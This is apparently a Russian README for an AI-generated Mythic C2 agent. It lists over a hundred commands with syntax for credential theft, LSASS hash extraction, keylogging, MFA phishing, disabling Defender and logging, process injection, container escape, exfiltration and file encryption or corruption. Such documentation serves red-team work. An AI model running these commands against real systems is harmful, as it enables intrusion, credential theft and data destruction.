
fawkes — Updated!
Fawkes — это golang Mythic C2 агент, написанный исключительно ИИ.
Fawkes Mythic C2 Agent
Fawkes — это целиком созданный с помощью vibe-кодирования агент Mythic C2. Это началось как «интересно», а превратилось в цель. Моя цель — не написать ни строчки кода для этого агента, а исключительно создавать его с помощью промптов.
Изначально я пытался написать агента сам, но после клонирования примера контейнера, чтения документации Mythic, просмотра видео серии разработчика на YouTube и копирования кода из других агентов, таких как Merlin или Freyja, я решил, что у меня просто нет времени на разработку собственного агента. А вот для промптов время у меня есть.
Fawkes — это агент на Golang с кроссплатформенными возможностями. Он поддерживает Windows (EXE, DLL и шеллкод), Linux (ELF-бинарники и разделяемые библиотеки) и macOS (Mach-O-бинарники для Intel и Apple Silicon). Всего 213 команд: 113 кроссплатформенных, 82 только для Windows, 21 только для Unix, 11 только для Linux и 6 только для macOS (некоторые команды имеют платформозависимые реализации, объединённые одним пользовательским именем, например screenshot). Поддерживает HTTP-исходящие соединения и TCP-соединения peer-to-peer (P2P) для внутреннего перемещения.
Установка
Чтобы установить Fawkes, вам потребуется Mythic, установленный на удалённом компьютере. Инструкции по установке Mythic можно найти на странице проекта Mythic.
Из каталога установки Mythic:``` ./mythic-cli install github https://github.com/galoryber/fawkes
## Краткий справочник командCommand | Syntax | Description
------- | ------ | -----------
acl-edit | `acl-edit -action read -server dc01 -target user` | Чтение/изменение DACL объектов Active Directory (добавление/удаление ACE, предоставление DCSync, GenericAll, резервное копирование/восстановление). Кроссплатформенный (T1222.001, T1098, T1003.006).
adcs | `adcs -action <cas\|templates\|find\|request\|auto-exploit> -server <DC> -username <user@domain> -password <pass> [-ca_name <CA>] [-template <name>] [-alt_name <UPN>]` | Перебор служб сертификации AD, поиск уязвимых шаблонов (ESC1-ESC4, ESC6 через DCOM), запрос сертификатов через DCOM для эксплуатации ESC1/ESC6 или автоэксплуатация (цепочка find → parse → request). Кроссплатформенный (T1649).
ads | `ads -action <write\|read\|list\|delete> -file <path> [-stream <name>] [-data <content>] [-hex true]` | **(Только Windows)** Управление альтернативными потоками данных NTFS — запись, чтение, вывод списка или удаление скрытых потоков данных. Поддерживает текст и шестнадцатеричные двоичные данные. MITRE T1564.004.
amcache | `amcache -action <query\|search\|delete\|clear> [-name <pattern>] [-count <n>]` | Запрос и очистка артефактов выполнения для криминалистики. Windows: Shimcache. Linux: recently-used.xbel, эскизы, Tracker. macOS: недавние элементы, KnowledgeC, карантин (T1070.004).
apc-injection | `apc-injection [-method <apc\|hwbp>] -pid <PID> [-tid <TID>] [-target_api ntdll!NtDelayExecution] [-timeout_ms 30000]` | **(Только Windows)** Внедрение в удаленный процесс. `-method apc` (по умолчанию) ставит шелл-код в очередь через NtQueueApcThread в поток, находящийся в состоянии ожидания (используйте `ts` для поиска такого). `-method hwbp` присоединяется через DebugActiveProcess, устанавливает аппаратную точку останова DR0 на целевом API (по умолчанию `ntdll!NtDelayExecution`) и перенаправляет Rip на шелл-код при срабатывании точки останова — не требует TID, очереди APC или CreateRemoteThread (T1055.004, T1055).
audio-capture | `audio-capture [-duration 10] [-sample_rate 16000] [-channels 1] [-device default]` | Запись звука с микрофона и загрузка WAV-файла. Windows (waveIn), Linux (arecord/parecord), macOS (rec/ffmpeg). Кроссплатформенный (T1123).
auditpol | `auditpol -action <query\|disable\|enable\|stealth> [-category <name\|all>]` | **(Только Windows)** Запрос и изменение политик аудита Windows. Отключение журналирования событий безопасности перед чувствительными операциями. Режим Stealth отключает подкатегории, критически важные для обнаружения. Использует API AuditQuerySystemPolicy (T1562.002).
argue | `argue -command "cmd.exe /c whoami" -spoof "cmd.exe /c echo hello"` | **(Только Windows)** Выполнение команды с подменой аргументов процесса. Обходит Sysmon Event ID 1 и телеметрию командной строки EDR (T1564.010).
arp | `arp [-ip <subnet>]` or `arp -action spoof -target <IP> -gateway <IP>` | Отображение ARP-таблицы с фильтрацией или отравление ARP-кэша для позиционирования MITM (T1557.002). Spoof: только Linux, восстанавливается при очистке.
asrep-roast | `asrep-roast -server <DC> -username <user@domain> -password <pass> [-account <target>]` | Запрос билетов AS-REP для учетных записей без предварительной аутентификации и извлечение хэшей в формате hashcat для офлайн-взлома. Автоматически перечисляет через LDAP. Кроссплатформенный (T1558.004).
av-detect | `av-detect [-deep true]` | Обнаружение установленных продуктов AV/EDR/безопасности путем сканирования запущенных процессов по базе из 130+ сигнатур. С `--deep` также проверяет модули ядра, модули systemd и каталоги конфигурации на предмет установленных, но не запущенных продуктов (Linux). Сообщает о продукте, вендоре, типе и PID. Кроссплатформенный.
autopatch | `autopatch <dll_name> <function_name> <num_bytes>` | **(Только Windows)** Автоматическое патчинг функции путем перехода к ближайшей инструкции возврата (C3). Полезно для обхода AMSI/ETW.
base64 | `base64 -action <encode\|decode\|xor\|hex\|hex-decode\|rot13\|url\|url-decode\|caesar> -input <data> [-key <key>] [-shift <N>] [-file true] [-output <path>]` | Набор инструментов кодирования данных: base64, XOR (с строковым/шестнадцатеричным ключом), hex, ROT13, URL-процентное кодирование, шифр Цезаря. Все поддерживают ввод/вывод файлов. Кроссплатформенный (T1132.001, T1140, T1027).
bits | `bits -action <list\|create\|persist\|cancel\|suspend\|resume\|complete> [-name <job>] [-url <URL>] [-path <local>] [-command <exe>]` | **(Только Windows)** Управление заданиями передачи BITS для персистентности и скрытой загрузки файлов. Создание, приостановка, возобновление, завершение заданий и установка команд уведомления для персистентности. Задания переживают перезагрузки (T1197).
browser | `browser [-action <passwords\|cookies\|history\|autofill\|bookmarks\|downloads>] [-browser <all\|chrome\|edge\|chromium\|firefox>]` | Сбор данных браузера из Chromium, Firefox и Safari. История, автозаполнение, закладки, загрузки — кроссплатформенно. Пароли: Chromium (DPAPI/Keychain/GNOME Keyring), Firefox (расшифровка NSS key4.db), Safari (связка ключей macOS). Куки Firefox на всех платформах. MITRE T1555.003, T1217.
cat | `cat <file>` или `cat -path <file> -start N -end N -number true` | Отображение содержимого файла с опциональным диапазоном строк, нумерацией и защитой от файлов размером >5MB.
cd | `cd <directory>` | Изменить текущий рабочий каталог.
chmod | `chmod -path <file> -mode <permissions> [-recursive true]` | Изменение разрешений файла/каталога с восьмеричной (755, 644) или символьной (+x, u+rw, go-w) нотацией. Рекурсивная поддержка. Кроссплатформенный (T1222).
chown | `chown -path <file> -owner <user> [-group <group>] [-recursive true]` | **(Только Linux/macOS)** Изменение владельца файла/каталога по имени пользователя/UID и группе/GID. Рекурсивная поддержка (T1222).
cert-check | `cert-check -host <hostname> [-port 443] [-timeout 10]` | Проверка TLS-сертификатов на удаленных хостах — определяет центры сертификации, самоподписанные сертификаты, срок действия, SAN, версию TLS, наборы шифров и отпечатки SHA256. Кроссплатформенный (T1590.001).
certstore | `certstore -action <list\|find> [-store <MY\|ROOT\|CA\|Trust\|TrustedPeople>] [-filter <substring>]` | **(Только Windows)** Перечисление хранилищ сертификатов Windows для поиска сертификатов подписи кода, аутентификации клиента и закрытых ключей. Поиск в CurrentUser и LocalMachine. MITRE T1552.004, T1649.
clipboard | `clipboard -action <read\|write\|monitor\|dump\|stop> [-data "text"] [-interval 3]` | Чтение/запись буфера обмена или непрерывный мониторинг изменений с обнаружением шаблонов учетных данных. Кроссплатформенный (T1115).
cloud-metadata | `cloud-metadata -action <detect\|creds\|storage\|aws-iam\|azure-graph\|gcp-iam\|aws-s3\|azure-blob\|gcp-gcs\|aws-persist\|azure-persist\|aws-ssm\|azure-keyvault\|gcp-secrets\|...> [-provider <auto\|aws\|azure\|gcp\|do>]` | Облачные метаданные, извлечение учетных данных, перечисление IAM, перечисление хранилищ, персистентность и доступ к хранилищам секретов. storage/aws-s3/azure-blob/gcp-gcs: перечисление корзин/контейнеров с примерами объектов. aws-ssm: Parameter Store SSM с расшифровкой. azure-keyvault: секреты Key Vault через управляемое удостоверение. gcp-secrets: Secret Manager через сервисный аккаунт. aws-persist/azure-persist: создание долгоживущих ключей доступа/регистраций приложений. Автоопределение. IMDSv2. Кроссплатформенный (T1552.005, T1580, T1530, T1098.001).
compress | `compress -action <create\|list\|extract\|stage\|exfil\|stage-exfil\|exfil-https\|exfil-github> -path <path> [-format zip\|tar.gz] [-output <out>] [-pattern *.txt] [-cleanup true]` | Создание, просмотр, извлечение, подготовка или эксфильтрация архивов. Stage шифрует с AES-256-GCM. Exfil передает в Mythic. exfil-https: загрузка по предварительно подписанным URL в S3/Azure/GCS с разбивкой на части, пользовательскими заголовками, джиттером. exfil-github: эксфильтрация через GitHub Contents API. Кроссплатформенный (T1560.001, T1074.001, T1041, T1048, T1567, T1567.001).
coerce | `coerce -server <target> -listener <attacker-ip> [-method petitpotam\|printerbug\|shadowcoerce\|all] -username <user> [-password <pass>] [-hash <NT hash>] [-domain <domain>]` | Принудительная аутентификация NTLM через MS-EFSR (PetitPotam), MS-RPRN (PrinterBug), MS-FSRVP (ShadowCoerce). Заставляет целевой хост аутентифицироваться на слушателе атакующего. Поддержка Pass-the-Hash. Кроссплатформенный (T1187).
config | `config [-action show\|set\|update] [-key sleep\|jitter\|killdate\|working_hours_start\|working_hours_end\|working_days] [-value <val>] [-file <binary>] [-hash <sha256>]` | Просмотр или изменение конфигурации времени выполнения агента или самостоятельное обновление бинарного файла агента. `show`/`set`: сон, джиттер, дата завершения, часы работы. `update`: загрузка новой полезной нагрузки из Mythic, проверка, запуск и завершение текущего агента. Кроссплатформенный (T1105).
container-detect | `container-detect` | Обнаружение среды контейнера и среды выполнения (Docker, K8s, LXC, Podman, WSL). Проверяет векторы побега, такие как Docker-сокеты и сервисные аккаунты K8s. Кроссплатформенный (T1082, T1497.001).
container-escape | `container-escape -action <check\|docker-sock\|cgroup\|nsenter\|mount-host\|k8s-enum\|k8s-secrets\|k8s-rbac\|k8s-nodes\|k8s-etcd\|k8s-deploy\|k8s-exec> [-command '<cmd>'] [-path <ns>\|<ns1,ns2,...>\|*] [-kubeconfig /path/to/config]` | **(Только Linux)** Побег из контейнера + операции с K8s — сокет Docker, cgroup, nsenter, монтирование устройства хоста. K8s: перечисление подов/сервисов, чтение секретов, **k8s-rbac**: проверка ClusterRole/RoleBinding + оценка путей повышения привилегий (крит/предупр/инфо), **k8s-nodes**: поверхность атаки узлов кластера (kubelet/ОС/ядро/CIDR/taints/роли), **k8s-etcd**: обнаружение конечных точек etcd из аргументов pod control-plane + неаутентифицированный зонд `/version` на каждую конечную точку (неаутентифицированное чтение = полная компрометация кластера), развертывание/выполнение подов через API. **Вне кластера**: `-kubeconfig` принимает украденные файлы kubeconfig для доступа к K8s с хостов вне контейнера (аутентификация по токену + сертификату клиента) (T1611, T1610, T1613, T1552.007, T1069.003, T1087.004).
cp | `cp <source> <destination>` | Копировать файл из источника в назначение.
cred-check | `cred-check [-action check\|verify-all] -hosts <IPs/CIDRs> -username <DOMAIN\user> -password <pass> [-hash <NTLM>] [-timeout <seconds>]` | Проверка учетных данных на SMB, WinRM и LDAP на целевых хостах. `verify-all` проверяет все учетные данные из хранилища на обнаруженных хостах параллельно. Кроссплатформенный (T1110.001, T1078).
cred-harvest | `cred-harvest -action <shadow\|cloud\|configs\|history\|windows\|m365-tokens\|browser-live\|all\|dump-all> [-user <username>]` | Сбор учетных данных: теневые хэши (Unix), облачные конфиги (AWS/GCP/Azure/K8s), секреты приложений, сканирование истории оболочки на утекшие пароли/токены/ключи API, история PowerShell + переменные среды + RDP (Windows), токены M365 OAuth/JWT из TokenBroker/Teams/Outlook (Windows), **browser-live**: кража живых куки, localStorage, sessionStorage через Chrome DevTools Protocol (CDP) из запущенных Chrome/Edge. **dump-all**: автоматизированная цепочка подзадач — запускает hashdump + lsa-secrets + cred-harvest все параллельно (Windows). Кроссплатформенный (T1552, T1003.008, T1528, T1539).
credential-prompt | `credential-prompt [-action dialog\|device-code\|mfa-phish] [-title "Authentication Required"] [-message "Enter your credentials..."] [-icon caution]` | Отображение нативного диалога учетных данных, злоупотребление потоком кода устройства OAuth или фишинг кодов MFA. dialog: macOS AppleScript, Windows CredUI, Linux zenity/kdialog. device-code: поток кода устройства Azure AD OAuth для захвата токена. mfa-phish: поддельный диалог проверки MFA для захвата кодов TOTP. Кроссплатформенный (T1056.002, T1621, T1111).
curl | `curl -url <URL> [-method GET\|PUT\|POST] [-file <path>] [-upload raw\|multipart] [-headers '{"K":"V"}'] [-body <data>]` | HTTP-запросы + загрузка файлов (эксфильтрация) (T1567). Загрузка на предварительно подписанные URL S3, SAS Azure, универсальные конечные точки. Кроссплатформенный (T1106, T1567.002).
cut | `cut -path <file> -delimiter <char> -fields <1,3\|1-3\|2-> [-chars <1-10>]` | Извлечение полей или диапазонов символов из строк файла. Пользовательские разделители, спецификации диапазона. Кроссплатформенный (T1083).
credman | `credman [-action <list\|dump\|vault>] [-filter <pattern>]` | Перечисление хранилищ учетных данных платформы. Windows: Credential Manager + Vault (CredEnumerateW, vaultcli.dll). Linux: GNOME Keyring (secret-tool), KDE KWallet, пароли WiFi/VPN NetworkManager, учетные записи GNOME Online. macOS: элементы связки ключей (общие пароли + пароли интернета), пароли WiFi. `list`=метаданные, `dump`=с секретами, `vault`=только Windows. MITRE T1555.004, T1555.001.
defender | `defender -action <status\|exclusions\|add-exclusion\|remove-exclusion\|threats\|enable\|disable> [-type <path\|process\|extension>] [-value <val>]` | **(Только Windows)** Управление Defender — статус, исключения, угрозы, включение/отключение защиты в реальном времени. MITRE T1562.001.
dpapi | `dpapi -action <decrypt\|masterkeys\|chrome-key> [-blob <base64>] [-entropy <base64>]` | **(Только Windows)** Расшифровка BLOB DPAPI (CryptUnprotectData), перечисление главных ключей, извлечение ключа шифрования Chrome/Edge. MITRE T1555.003/T1555.005.
email | `email -action <count\|search\|read\|folders> [-folder <name>] [-query <keyword>] [-index <n>]` | **(Только Windows)** Доступ к почтовому ящику Outlook через COM. Подсчет сообщений, поиск по ключевым словам, чтение по индексу, список папок. MITRE T1114.001.
dcom | `dcom -action <exec\|upload\|exec-staged\|check> -host <target> -command <cmd> [-args <arguments>] [-object mmc20\|shellwindows\|shellbrowser\|wscript\|excel\|outlook]` | **(Только Windows)** Выполнение команд, загрузка файлов или поэтапное выполнение на удаленных хостах через DCOM. `check` проверяет предварительные требования RPC/DCOM. upload: передача файлов через certutil/PowerShell staging. exec-staged: загрузка, затем выполнение с автоочисткой. Шесть COM-объектов. MITRE T1021.003, T1570.
debug-detect | `debug-detect` | Обнаружение подключенных отладчиков, инструментов анализа и инструментации. Windows: IsDebuggerPresent, NtQueryInformationProcess, PEB, регистры DR. Linux: TracerPid, LD_PRELOAD, карты памяти (Frida/Valgrind/sanitizers), VM/песочница, мониторинг eBPF (Falco/Tetragon/Tracee), фреймворк auditd, ptrace scope. macOS: sysctl P_TRACED, DYLD_INSERT_LIBRARIES, обнаружение VM (sysctl), продукты безопасности (EDR/AV), песочница/среда анализа. Все: сканирование процессов отладчика (T1497.001).
dcsync | `dcsync [-action sync\|domain-takeover] -server <DC> -username <user> [-password <pass>] [-hash <NT hash>] [-target <account[,account2]>]` | DCSync — репликация учетных данных AD через DRS без обращения к LSASS. `domain-takeover` запускает kerberoast + asrep-roast + dcsync krbtgt/Administrator параллельно. Кроссплатформенный (T1003.006).
df | `df [-filesystem <device>] [-mount_point <path>] [-fstype <type>]` | Отчет об использовании дискового пространства файловой системы с опциональной фильтрацией по устройству, точке монтирования или типу ФС. Кроссплатформенный (T1082).
diff | `diff -file1 <path> -file2 <path> [-context <n>]` | Сравнение двух файлов и отображение различий в унифицированном формате diff. Алгоритм на основе LCS с настраиваемым количеством строк контекста. Кроссплатформенный (T1083).
dns | `dns -action <resolve\|reverse\|srv\|mx\|ns\|txt\|cname\|all\|dc\|zone-transfer\|wildcard\|exfil\|doh> -target <host> [-server <dns_ip>]` | Перечисление DNS — разрешение хостов, запрос записей, обнаружение DC, передача зоны, обнаружение wildcard, разрешение через DNS-over-HTTPS скрытно, эксфильтрация DNS. Кроссплатформенный (T1018, T1071.004, T1048.001).
du | `du -path <file_or_dir> [-max_depth <n>]` | Отчет об использовании диска для файлов и каталогов. Разбивка размера по подкаталогам, сортировка по наибольшему. Кроссплатформенный (T1083).
drivers | `drivers [-filter <name>]` | Перечисление загруженных драйверов ядра/модулей. Windows: EnumDeviceDrivers, Linux: /proc/modules, macOS: перечисление kext. Кроссплатформенный (T1082).
domain-policy | `domain-policy -action <all\|password\|lockout\|fgpp> -server <DC> -username <user@domain> -password <pass>` | Перечисление политик паролей/блокировки AD и FGPP через LDAP. Рекомендации для безопасного подбора. Кроссплатформенный (T1201).
crontab | `crontab -action <list\|add\|remove> [-entry <cron_line>] [-program <path>] [-schedule <schedule>]` | **(Только Linux/macOS)** Просмотр, добавление или удаление заданий cron для персистентности. Поддерживает сырые записи cron или синтаксис программа+расписание.
download | `download <path>` or `download {"path": "/file", "compress": true}` | Скачать файл или каталог с целевого хоста. Файлы >1MB автоматически сжимаются gzip (настраиваемо). Каталоги автоматически архивируются в zip. Проверка SHA256. Передача частями, интеграция с файловым браузером.
drives | `drives` | Список доступных дисков/томов и смонтированных файловых систем с типом, меткой/устройством и свободным/общим пространством.
enum-tokens | `enum-tokens [-action list\|unique] [-user <filter>]` | **(Только Windows)** Перечисление токенов доступа во всех процессах. `list` показывает PID/пользователь/уровень целостности/сессию для каждого процесса. `unique` группирует по пользователю с количеством процессов. Автоматически включает привилегию SeDebugPrivilege (T1134, T1057).
encrypt | `encrypt -action <encrypt\|decrypt\|encrypt-files\|decrypt-files\|corrupt\|corrupt-files> -path <file_or_glob> [-key <base64key>] [-confirm SIMULATE\|CORRUPT]` | Шифрование/расшифровка AES-256-GCM (T1486) + целевое повреждение файлов (T1565). corrupt: перезапись заголовков файлов случайными данными. Для разрушительных операций требуется подтверждение безопасности.
env | `env [-action <list\|get\|set\|unset>] [-name <VAR>] [-value <val>] [-filter <pattern>]` | Список, получение, установка или удаление переменных среды для процесса агента. Изменения наследуются дочерними процессами. Кроссплатформенный.
env-scan | `env-scan [-pid <PID>] [-filter <pattern>]` | Сканирование переменных среды процесса на утекшие учетные данные, ключи API и секреты. 35+ шаблонов обнаружения для облачных, СУБД, CI/CD и криптовалютных категорий. Linux + macOS (T1057, T1552.001).
etw | `etw -action <sessions\|rules\|agents\|patch\|restore\|blind-all\|...> [-session_name <name>] [-provider <guid\|shorthand>]` | **(Windows, Linux, macOS)** Манипуляция подсистемами аудита/телеметрии. Windows: сессии/провайдеры ETW stop/blind/blind-all/enable/patch/restore. Linux: правила auditd, очистка/ротация journald, конфиг syslog, обнаружение SIEM-агентов. macOS: унифицированное журналирование, обнаружение агентов безопасности. (T1562, T1070.002).
eventlog | `eventlog -action <list\|query\|clear\|info\|enable\|disable> [-channel <name\|unit\|subsystem\|path>] [-event_id <id>] [-filter <xpath\|keyword\|timewindow>] [-count <max>]` | Управление системными журналами событий. Windows: каналы wevtapi.dll. Linux: модули journald и файлы syslog. macOS: унифицированное журналирование (os_log) подсистем/процессов. Список источников, запрос событий, очистка/вакуумирование журналов, получение информации. MITRE T1070.001, T1562.002.
execute-memory | `execute-memory -arguments 'arg1 arg2' -timeout 60` | Выполнение нативного бинарного файла из памяти. Linux: memfd_create (без записи на диск). macOS: временный файл с произвольной подписью ad-hoc. Windows: временный файл с немедленной очисткой. Все платформы удаляют артефакты после выполнения. MITRE T1620.
execute-shellcode | `execute-shellcode [-technique mmap\|memfd] [-encoding none\|xor\|aes] [-key hex]` | Выполнение шелл-кода в текущем процессе. Поддерживает шелл-код, закодированный XOR/AES-256-CTR, с декодированием во время выполнения (T1027). Windows: VirtualAlloc + CreateThread. Linux: mmap (по умолчанию) или memfd_create. macOS: MAP_JIT (ARM64) или mmap. Кроссплатформенный (T1059.006, T1620).
exit | `exit` | Завершить задачу агента.
file-attr | `file-attr -path <file> [-attrs "+hidden,-readonly,+immutable"]` | Получение или установка атрибутов файла — скрытый, только для чтения, системный (Windows); неизменяемый, добавление, nodump (Linux); скрытый, неизменяемый (macOS). Опустите -attrs для просмотра текущих флагов. Кроссплатформенный (T1564.001, T1222).
file-type | `file-type -path <file_or_dir> [-recursive true] [-max_files 100]` | Определение типа файла по магическим байтам (35+ сигнатур). Одиночный файл или сканирование каталога. Обнаруживает исполняемые файлы, архивы, документы, изображения, базы данных, медиа и многое другое. Кроссплатформенный (T1083).
find | `find -pattern <glob> [-path <dir>] [-min_size <bytes>] [-max_size <bytes>] [-newer <min>] [-older <min>] [-type f\|d] [-perm suid\|sgid\|writable\|executable\|<octal>] [-owner <user\|uid>]` | Поиск файлов по имени, размеру, дате, разрешениям или владельцу. Поиск SUID-бинарников, файлов с правами на запись для всех, файлов, принадлежащих конкретным пользователям. Кроссплатформенный (T1083).
find-admin | `find-admin -hosts <targets> -username <user> -password <pass> [-method smb\|winrm\|both] [-hash <NT>] [-action scan\|auto-move] [-lateral_method psexec\|wmi] [-lateral_command <cmd>]` | Сканирование хостов для обнаружения, где учетные данные имеют права администратора через SMB (общая папка C$) и/или WinRM. **auto-move**: автоматизированная цепочка подзадач — найти административные хосты, затем переместиться латерально к каждому через psexec/wmi. Поддерживает CIDR, диапазоны IP, PTH, параллельное сканирование (T1021.002, T1021.006).
firewall | `firewall -action <list\|add\|delete\|enable\|disable\|status\|pf-add\|pf-delete\|pf-list> [-name <rule>] [-direction <in\|out>] [-protocol <tcp\|udp\|any>] [-port <port>]` | **(Windows, macOS, Linux)** Управление правилами брандмауэра. Windows: COM API. macOS: ALF + привязанные правила pf. Linux: iptables/nftables (автоматически обнаруживается). Поддержка привязок PF для фильтрации пакетов macOS. MITRE T1562.004.
getprivs | `getprivs -action list\|enable\|disable\|strip [-privilege <name>]` | **(Windows, macOS, Linux)** Список привилегий/возможностей. Windows: привилегии токена с возможностью включения/отключения/удаления. Linux: возможности процесса (CapEff/CapPrm) + контекст SELinux/AppArmor. macOS: права, песочница, группы (T1134.002).
getsystem | `getsystem [-technique steal\|potato\|check\|sudo\|osascript]` | **(Windows, Linux, macOS)** Повышение привилегий. Windows: SYSTEM через кражу токена или DCOM potato. Linux: проверка векторов повышения (SUID, sudo, возможности, docker) или попытка повышения через sudo. macOS: проверка векторов, sudo или запрос прав администратора через osascript (T1134, T1548).
gpp-password | `gpp-password -server <DC> -username <user@domain> -password <pass>` | Поиск в SYSVOL XML-файлов GPP с зашифрованными атрибутами cpassword и расшифровка с использованием опубликованного ключа AES (MS14-025). Кроссплатформенный через SMB (T1552.006).
gpo | `gpo -action <list\|links\|find\|all> -server <DC> -username <user@domain> -password <pass> [-filter <name>]` | Перечисление объектов групповой политики через LDAP — список GPO, карта связей с принудительным применением, поиск интересных настроек CSE. Кроссплатформенный (T1615).
grep | `grep -pattern <regex> [-path <dir>] [-extensions .txt,.xml] [-ignore_case] [-max_results 100]` | Поиск содержимого файлов по регулярным выражениям. Рекурсивный поиск по каталогам с фильтрацией расширений, строками контекста и пропуском бинарных файлов. Кроссплатформенный (T1083, T1552.001).
hash | `hash -path <file_or_dir> [-algorithm md5\|sha1\|sha256\|sha512] [-recursive true] [-pattern *.exe] [-max_files 500]` | Вычисление хэшей файлов (MD5, SHA-1, SHA-256, SHA-512). Одиночные файлы или каталоги с фильтрацией по шаблону glob и контролем глубины. Кроссплатформенный (T1083).
hexdump | `hexdump -path <file> [-offset <bytes>] [-length <bytes>]` | Отображение содержимого файла в формате xxd (hex+ASCII). Управление смещением/длиной для просмотра конкретных областей, максимум 4096 байт. Кроссплатформенный (T1005).
handles | `handles -pid <pid> [-type File] [-show_names] [-max_count 500]` | **(Windows, Linux, macOS)** Перечисление открытых дескрипторов/файловых дескрипторов в процессе. Windows: NtQuerySystemInformation. Linux: /proc/pid/fd. macOS: lsof (T1057, T1082).
hashdump | `hashdump [-action dump\|insitu\|insitu-full\|tickets\|auto-spray] [-targets <hosts>] [-format json]` | **(Windows, Linux, macOS)** Извлечение хэшей паролей локальных учетных записей. Windows: хэши NTLM из раздела реестра SAM (требуется SYSTEM); **insitu**: перечисление активных сеансов входа через внутрипроцессные API LSA (требуется администратор); **insitu-full**: открытие lsass.exe с PROCESS_VM_READ, сигнатурное сканирование lsasrv.dll для поиска LogonSessionList, обход связного списка, наложение структуры KIWI_MSV1_0_LIST_63 на каждый узел для извлечения LUID/UserName/Domain/AuthPackage/LogonType/Credentials-pointer, обход цепочки учетных данных для каждого поставщика аутентификации по credentials_ptr для захвата каждой оболочки KIWI_MSV1_0_PRIMARY_CREDENTIAL_ENC, сигнатурное сканирование LsaInitializeProtectedMemory_Internal для восстановления глобальных переменных BCrypt ключей IV / h3DesKey / hAesKey, а также сырых 16-байтового IV / 24-байтового 3DES / 32-байтового ключа AES, расшифровка AES-256-CFB / 3DES-CBC каждого захваченного зашифрованного BLOB (выбор BLOB по `len % 8`), и наложение структуры KIWI_MSV1_0_PRIMARY_CREDENTIAL_10_NEW для извлечения хэшей NT/LM/SHA — вывод в формате `username:rid:lm:nt:::`, совместимом с хуком credential-vault действия dump-action ProcessResponse (Phase 2B + 2C-i + 2C-ii-a + 2C-ii-b + 2C-ii-c, Win10 21H2 — Win11 23H2, требуется администратор). Linux: хэши из /etc/shadow с определением типа хэша (требуется root). macOS: хэши PBKDF2 Directory Services из plist-файлов пользователей (требуется root). **auto-spray**: извлечение хэшей, затем автоматический перебор через cred-check по целевым хостам. MITRE T1003.002, T1003.008.
history-scrub | `history-scrub [-action list\|clear\|clear-all] [-user <username>]` | Просмотр или очистка файлов истории команд оболочки/приложений. Охватывает bash, zsh, fish, PowerShell, python, mysql и другие. Кроссплатформенный (T1070.003).
hollow | `hollow -filename <shellcode> [-target <process>] [-ppid <pid>] [-block_dlls true]` | Вытеснение процесса — создание приостановленного процесса, запись шелл-кода, перенаправление выполнения. **Windows:** CREATE_SUSPENDED + SetThreadContext, подмена PPID, блокировка DLL, украшение PEB (маскировка ImagePath/CommandLine/WindowTitle). **Linux (amd64/arm64):** запись PTRACE_TRACEME + /proc/mem. **macOS:** ptrace + Mach VM API (task_for_pid, mach_vm_allocate, mach_vm_write, mach_vm_protect) — требуется root. MITRE T1055.012, T1036.
ide-recon | `ide-recon -action <vscode\|jetbrains\|all> [-user <filter>]` | Перечисление конфигураций IDE — расширения VS Code, удаленные SSH-хосты, недавние проекты, настройки с секретами. Источники данных JetBrains, серверы развертывания, недавние проекты. Кроссплатформенный (T1005, T1083).
ifconfig | `ifconfig` | Список сетевых интерфейсов с адресами, MAC, MTU и флагами. Кроссплатформенный (Windows/Linux/macOS).
inline-assembly | `inline-assembly` | **(Только Windows)** Выполнение сборки .NET в памяти с использованием CLR. Поддерживает аргументы командной строки. Сначала используйте `start-clr` для рабочего процесса с патчем AMSI.
inline-execute | `inline-execute` | **(Только Windows)** Выполнение BOF/COFF в памяти. Поддерживает все типы аргументов: строки (z), широкие строки (Z), целые числа (i), short (s) и бинарные (b).
reflective-load | `reflective-load -dll_b64 <base64_dll> [-function <export>]` | **(Только Windows)** Загрузка нативного PE (DLL) из памяти в текущий процесс. Ручное отображение PE с копированием секций, исправлением перемещений, разрешением импорта и вызовом DllMain. Опционально вызывает экспортируемые функции (T1620).
iptables | `iptables -action <status\|rules\|nat\|add\|delete\|flush> [-rule <args>] [-table <name>]` | **(Только Linux)** Перечисление и управление брандмауэром Linux через iptables/nftables/ufw. IP-форвардинг, отслеживание соединений, просмотр и изменение правил. MITRE T1562.004.
jobkill | `jobkill -id <task-uuid>` | Остановка запущенной задачи по ID задачи. Используйте `jobs` для просмотра запущенных задач. Кроссплатформенный.
jobs | `jobs` | Список запущенных в данный момент задач с ID задачи, именем команды и длительностью. Кроссплатформенный.
jxa | `jxa -code '<script>' [-timeout 60]` или `jxa -file /path/to/script.js` | **(Только macOS)** Выполнение сценариев JavaScript for Automation (JXA) с доступом к мосту ObjC к фреймворкам Foundation, AppKit, Security. Поддерживает встроенный код и ввод из файла (T1059.007).
kerberoast | `kerberoast -server <DC> -username <user@domain> -password <pass> [-spn <SPN>]` | Запрос билетов TGS для SPN-учетных записей и извлечение хэшей в формате hashcat для офлайн-взлома. Автоматически перечисляет через LDAP. Кроссплатформенный (T1558.003).
klist | `klist -action <list\|purge\|dump\|import> [-server <filter>] [-ticket <base64>] [-path <path>]` | Перечисление, дамп, очистка и импорт билетов Kerberos. Импорт включает Pass-the-Ticket: Windows внедряет kirbi через LSA, Linux/macOS записывает ccache и устанавливает KRB5CCNAME. Кроссплатформенный (T1558, T1550.003).
keychain | `keychain -action <list\|dump\|find-password\|find-internet\|find-cert> [-service <name>] [-server <host>]` | **(Только macOS)** Доступ к связке ключей macOS — список связок, дамп метаданных, поиск общих/интернет-паролей, перечисление сертификатов.
kerb-delegation | `kerb-delegation -action <all\|unconstrained\|constrained\|rbcd\|monitor> -server <DC> -username <user@domain> -password <pass> [-duration <s>] [-interval <s>]` | Перечисление отношений делегирования Kerberos — неограниченное, ограниченное (с переходом по протоколу), RBCD. Действие **monitor** (Windows/SYSTEM только) опрашивает LSA на предмет входящих TGT и экспортирует их как BLOB kirbi. Кроссплатформенный, кроме monitor (T1550.003, T1558).
keylog | `keylog -action <start\|stop\|dump\|status\|clear>` | Низкоуровневый клавиатурный кейлоггер. Windows: SetWindowsHookEx. Linux: /dev/input evdev. macOS: IOKit HID. Обнаруживает события вставки Ctrl+V/Cmd+V и захватывает содержимое буфера обмена. Отслеживание контекста окна на всех платформах (T1056.001).
lateral-check | `lateral-check -hosts <IPs/CIDRs> [-timeout <seconds>]` | Проверка возможностей латерального перемещения против целей — проверяет SMB, WinRM, RDP, RPC, SSH-подключение и предлагает применимые методы. Кроссплатформенный (T1046, T1021).
